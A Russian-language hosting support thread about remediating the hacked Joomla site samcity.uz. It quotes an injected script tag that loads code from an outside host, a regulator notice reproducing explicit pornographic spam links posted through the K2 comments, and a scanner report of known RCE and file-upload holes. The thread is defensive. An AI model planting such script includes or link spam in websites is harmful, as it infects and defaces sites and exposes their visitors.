Хостинг от Golden Internet
Menu
надежный хостинг
бесперебойные каналы

  хостинг
<< Назад       Samcity.uz взломан

Вопрос: Здравствуйте, samcity.uz не открывается, пишет хром вред нанесет компьютеру, как вирус зашел, что заразил не могу понять, помогите пожалуйста, верю только в вас
Ответ:

Здравствуйте. когда вы это заметили?

Ответ:

https://sitecheck.sucuri.net/results/samcity.uz

Вопрос: Вчера все было отлично, сегодня захожу и такое говорит хром
Ответ:

Это ваш скрипт?

script type="text/javascript" src="http://sovety-remonta.ru/bjzvck7x.php?id=8291829" /script
Вопрос: Нет не мой, я его только что обнаружил в файле imdex.php шаблона и удалил. Как это взломали сайт не понимаю. Чтоб в дальнейшем защитить. Как лазейку закрыть...
Вопрос: Права на некоторые директории изменились, стали 700, а было 755, это вы что то проверяете или хакер?
Ответ:

антивирус ничего ен нашел. мы восстановим файлы из бекапа, если не поможет, вам нужно обратиться в стороннюю организацию для решения проблемы

например http://www.revisium.com/

Вопрос: Процесс как будет завершен, дайте знать пожалуйста. Спасибо!
Ответ:

мы уже восстановлили файлы

Вопрос: Здравствуйте, заметил на сайте samcity.uz в компоненте K2 комментарии непристойного содержания от имени администратора в материалах. Непонятно, получается кто то нашел лазейку к этому компоненту K2. Что необходимо предпринять мне, и чем можете помочь мне вы. Помогите пожалуйста решить проблему. Это связано с письмом следующего содержания, которое пришло сегодня: Уведомляем Вас о том, что в наш адрес поступило письмо от Центра мониторинга в сфере массовых коммуникаций Государственного комитета связи, информатизации и телекоммуникационных технологий Республики Узбекистан о выявлении на веб сайте samcity.uz, зарегистрированном в доменной зоне .uz, материалов, противоречащих действующему законодательству Республики Узбекистан. В материалах сайта размещена информация непристойного содержания. Цитата: «Смотреть Порно Онлайн На http://fapaka.ru/skvirting/15880-Porno-roliki-dlya-prosmotra-pryamo-seychas(ҳавола) линк: клацни побыстрей ... Любишь линк? Кликай быстрее на http://fapaka.ru/skvirting/17246-Porno-video-bolshih-zhop(ҳавола) - эта ссылочка сможет привести тебя на прекрасный интернет-проект. По ссылочке есть порно-ролики на самый разный вкус - непродолжительные и длинные, с юными и взрослыми девушками, секс парочек и целых компашек. А наиболее приятно это то, что подборка добавляется ежедневно. смотреть порно на http://fapaka.ru/shlyuhi/10103-Syn-s-mamoy-insest» Ссылки: http://samcity.uz/?option=com_k2&view=itemlist&task=user&id=1885 Рекомендуем установить премодерацию во избежание подобных проблем. Просим принять меры по устранению допущенных нарушений. Доменное имя будет деактивировано, если нарушения не будут исправлены в течение 3-х суток. Пожалуйста, ознакомьтесь с правилами доменной зоны .UZ Также, доводим до вашего сведения, что публикация где-либо рабочей переписки и заключений Центра Мониторинга недопустима. С уважением, Артур Крюков Менеджер по продажам | ActiveCloud | https://active.uz
Ответ:

Здравствуйте. удалите этот компонент если администратор сайта не может следить за коментариями в нем.

та кже рекомендуем проверить и обновить движок сайта до самой последней версии.

сейчас мы проверим сайт на вирусы и уязвимости. от комонента  K2 Вам лучше отказаться т.к он часто содержит уязвимости

Вопрос: Комментарии без одобрения не публикуются. Ну в общем пока вообще отключил какое либо комментирование. А насчет перехода на другой компонент можно и подумать. А насчет итогов проверки компонента буду ждать ответа от вас.
Ответ:

samcity.uz/AI-BOLIT-REPORT-__-212186-05-01-2017_13-51.html

Критические замечания
Уязвимости в скриптах (3)
/home/splaza/samcity.uz/libraries/joomla/session/session.php - RCE : https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
/home/splaza/samcity.uz/components/com_adsmanager/controller.php - AFU : https://revisium.com/ru/blog/adsmanager_afu.html
/home/splaza/samcity.uz/administrator/components/com_k2/lib/elfinder/elFinder.class.php - AFU : elFinder

 

Вопрос: Сравнил этот файл у компонента K2 2.68 с таким же файлом из самой новой версии k2 2.71 - в итоге абсолютно такой же файл. В общем отпала идея обновлять компонент только...
Ответ:

компонет уязвим. у вас минимум три известных уязвимости на сайте


<< Назад


© 2004 - 2017 Golden Internet. All rights reserved